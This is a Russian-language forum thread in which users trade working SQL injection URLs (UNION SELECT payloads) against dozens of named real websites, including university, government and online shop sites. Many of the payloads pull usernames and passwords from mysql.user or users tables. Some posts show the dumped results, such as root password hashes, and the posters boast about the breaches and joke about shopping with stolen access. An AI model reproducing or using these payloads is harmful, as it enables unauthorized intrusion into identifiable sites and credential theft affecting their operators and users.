SQL Инъекции

Code:

http://www.sra.org/opportunities_detail.php?id=-1+union+select+1,2,3,convert(concat(user,char(58),password)+using+latin1),5,6,7,8+from+mysql.user+limit+0,1/*

root:6ae787f828f13555
________

Code:

http://www.actionscript.org/showMovie.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

На форуме 52,878 юзеров зарегано)))А на данный момент(время редактирования поста) находится на форуме 522 человек)))
_______
Microchip.by:

Code:

http://www.microchip.by/info.php?id=-1+union+select+1,2,3,version(),5/*

 

2 Ksander
там может и нет таблицы юзеров... ведь корзина, судя по всему, кукисы юзает, а не авторизацию.. да и админки я там не видел.
вот аналогичный случай:

Code:

http://www.fightbeat.com/article_detail.php?AT=-1+union+select+1,2,3,4,5,6,7,8/*

 

PHP:

http://zona.bloudil.cz/index.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9/*

 

"странное" в плане чего? 8о
Вывод в тайтле если что

 

Code:

http://emotive.ru/shop/index.php?CID=-1+union+select+1,version()+from+admin/*

 

Code:

http://www.intellectpro.ru/news/index.php?oper=view&news_id=-1+union+select+1,table_name,3+from+information_schema.tables/*

там 350+-50 таблиц, лично мне просматривать все лень
перебрал 50 шт. и забил)

 

PHP:

http://www.selfserviceworld.com/article.php?id=-1+union+select+1,password,3,4,5,6,7,8+from+mysql.user/*

PHP:

http://www.antipatriarcat.org/cmcs/titre.php?id=-1+union+select+1,2,3,4,5,6/*

 

Code:

http://www.onlife.ru/drink.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*

Нашел таблицу с юзверями и админами, а вот имена колонок подобрать не смог:

Code:

http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15,16/*
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+rozvaga_user/*
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+rozvaga_admin/*

 

http://www.chem.uci.edu/employment/display.employment.faculty.php?id=-6+union+select+1,2,password+from+mysql.user/*

http://artsci.wustl.edu/~acsp/faculty.php?action=person&id=-65+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

http://www.nsu.ru/psych/business/publication.php?id=-75+union+select+1,2,VERSION(),4,5,6/*

http://www.losingtoday.com/tales.php?id=-132+union+select+1,2,3,4,5,6/*

http://www.best-ipoteka.ru/tales.php?id=-132+union+select+1,2,3,4/*

 

Аллах акбар!

www.islam.ru

Code:

http://www.islam.ru/shop/index.php?cat=46&good=-1+union+select+1,convert(version(),char),3,4,5+from+users/*

 

Кто себе новый комп хочет ?=)

Code:

http://notes.asdplus.ru/shop/showbrand.php?brand=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,log,18,19,20+from+users+limit+6,1/*

Тут прикупить книжки и диски для компа =)

Code:

http://www.saranagati.net/shop/index.php?p=list&cid=-1+union+select+concat(login,char(58),password)+from+users/*

p.s.у меня чето все скули по темам идут =)

 

http://studybank.info/viewdetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,char(58),passwd),14+from+user+limit+0,1/*

Пассы в чистом виде)

 

Чтобы как то компенсировать казус с мейлом вот:

http://hotel.travel.rambler.ru

Правда там mssql

Code:

http://hotel.travel.rambler.ru/vitrina.asp?sDescr=-1

так чтоли ?

Code:

http://hotel.travel.rambler.ru/vitrina.asp?sDescr=-1+union+all+select+1 bla bla bla---

 

А вот и мой ШОП :

Code:

http://www.pikanteria.pl/towar.php?poz=subtelny&gr=sexi%20stroje&podgr=sukienki&id=-1+union+select+1,2,3,4,5,6,concat(user,char(58),pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users/*

 

Те кто хочет себе косметику сюда =)

marykay.freshop.ru

Табл.запарился подбирать.

Code:

http://marykay.freshop.ru/good.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*

 

http://www.aidan-gallery.ru/cgi/wgal.cgi?gid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+users/*
фух устал, скока же вас там %)
а на есламе - в таблице юзверс две записи, поле с логином.. гадал долго, nick! =) password,email,id
куда их вводить хз, и пассы не шифрованые даже... от форума не совпали от админа, там бб какойто

 

Code:

http://www.metro.waw.pl/page.php?id=+1+union+select+database(),user()/*

Code:

http://www.arclub-nsk.ru/dynamic.html?sec=-4&id=-1+union+select+1,database(),3,4/*

Code:

http://www.ohota-ribalka.com.ua/rehunt_1.htm?id=- 1+union+select+1,user,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2
2,23,24,25,26,27,28,29,30+from+mysql.user/*

Code:

http://www.moottoriliitto.fi/page.php?id=10+union+select+password+from+mysql.user+limit+1,1/*&type=muutsivut&page=6

Code:

http://www.promservice.com/index.php?page=news&lang=ru&id=-1+union+select+1,2,concat(e_mail,0x3a),4+from+users/*

Code:

http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(user,0x3a,password)%20using%20cp1251)%20+from+mysql.user/*

Code:

http://basic.forumservice.nl/lees.php?id=1&mid=-41+union+select+1,2,3,4,concat(password,0x3a,user),6,7,8+from+mysql.user/

 

Code:

http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user/

 

Монголия хекд!

www.president.mn

Code:

http://www.president.mn/show_module.php?index=dayinfo&dayinfoid=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*

p.s.

Как удалось табл.подобрать ? Оо

 

Code:

http://www.mobu.ru/download.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

регистрации вроде нет, доступ в админку через .htaccess но все же)

Code:

http://www.hushpuppies.ru/cat_item.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5+from+mysql.user/*

root:*9B56E42584D2F6F2CCF6039BA43F1039CAAD7C97
mysql5

Code:

http://shop.turistua.com/index.php?x_id=-1+union+select+version()/*

это просто так